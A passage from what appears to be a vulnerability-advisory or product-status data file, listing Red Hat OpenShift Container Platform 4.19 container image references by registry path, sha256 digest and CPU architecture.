"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
